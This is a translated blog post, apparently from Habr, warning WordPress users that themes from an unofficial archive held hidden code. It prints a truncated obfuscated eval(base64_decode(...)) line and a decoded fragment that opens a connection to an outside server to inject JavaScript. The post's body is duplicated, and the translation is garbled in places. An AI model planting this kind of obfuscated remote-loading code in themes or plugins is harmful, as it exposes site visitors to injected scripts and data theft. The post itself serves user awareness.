Caution! An evil theme ... for WordPress!
After the previous post about the themes , a look from the other side, or to be exact, the post is for those users who are downloading all these topics.
In general, recently the number of posts about hacking various blogs on WordPress has greatly increased, and all because people forget to update to the latest version. But even the presence of the latest stable version from off.site does not guarantee that you will not be “lost”.
Recently I came across a post about an interesting way that hackers use to get information about the site.
For those who are not very friendly with the angelic language, I will briefly tell you what it is about:
A certain designer Derek Punsalan made Temko ( or rather even a few ) for WordPress and decided to donate them to the whole world. As a result, she scattered across a bunch of different thematic archives, one of which was WpSphere . And what do you think?
After downloading and installing from this site, some users noticed that there is something like this in the text of the pages
If you do not understand PHP, I will explain - this method is used to hide the real executable code, because after decoding (function, base64_decode), the text will look somewhat more suspicious
As a result of the execution of this script, java-script was loaded from one of the servers (I indicated only a part of the source code). According to one of the bloggers, Paul Carol , who conducted research on the “harmfulness” of this code, it turns out that nothing bad happened, and Wp-Sphere simply monitored the number of installations of themes.
')
But in spite of this, something is too much a big security hole, because by introducing a Java script onto a page, attackers can easily run ads, and what's worse is to get information stored in the browser.
This entire post is written to make you think before installing another topic , downloaded from unverified sources. Or, in any case, they checked that there is inside her, and if you cannot do it yourself (for the reason that any code is a set of meaningless signs for you), then ask someone who understands that you can be me.
And finally, I can easily include themes.wordpress.net site for trusted sources, because the official one, as well as I advise you to read the WordPress Quick Start Guide from Maxim, I will soon try to publish not a short, but a large and versatile one.
Peace to you and secure Internet and WordPress.
Original article “Caution! An evil theme ... for WordPress! ”
In general, recently the number of posts about hacking various blogs on WordPress has greatly increased, and all because people forget to update to the latest version. But even the presence of the latest stable version from off.site does not guarantee that you will not be “lost”.
Recently I came across a post about an interesting way that hackers use to get information about the site.
For those who are not very friendly with the angelic language, I will briefly tell you what it is about:
A certain designer Derek Punsalan made Temko ( or rather even a few ) for WordPress and decided to donate them to the whole world. As a result, she scattered across a bunch of different thematic archives, one of which was WpSphere . And what do you think?
After downloading and installing from this site, some users noticed that there is something like this in the text of the pages
@eval (@ base64_decode ('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q \
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i ...
If you do not understand PHP, I will explain - this method is used to hide the real executable code, because after decoding (function, base64_decode), the text will look somewhat more suspicious
if ($ R37C014DAE5FE4FE5C77B6735ABC30916 =
@fsockopen (" www.wpssr.com ", 80,
$ R32D00070D4FFBCCE2FC669BBA812D4C2,
$ R5F525F5B398DADD7CF0784BD406298E3, 3))
$ R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; ...
As a result of the execution of this script, java-script was loaded from one of the servers (I indicated only a part of the source code). According to one of the bloggers, Paul Carol , who conducted research on the “harmfulness” of this code, it turns out that nothing bad happened, and Wp-Sphere simply monitored the number of installations of themes.
')
But in spite of this, something is too much a big security hole, because by introducing a Java script onto a page, attackers can easily run ads, and what's worse is to get information stored in the browser.
This entire post is written to make you think before installing another topic , downloaded from unverified sources. Or, in any case, they checked that there is inside her, and if you cannot do it yourself (for the reason that any code is a set of meaningless signs for you), then ask someone who understands that you can be me.
And finally, I can easily include themes.wordpress.net site for trusted sources, because the official one, as well as I advise you to read the WordPress Quick Start Guide from Maxim, I will soon try to publish not a short, but a large and versatile one.
Peace to you and secure Internet and WordPress.
Original article “Caution! An evil theme ... for WordPress! ”
Source: https://habr.com/ru/post/17010/
All Articles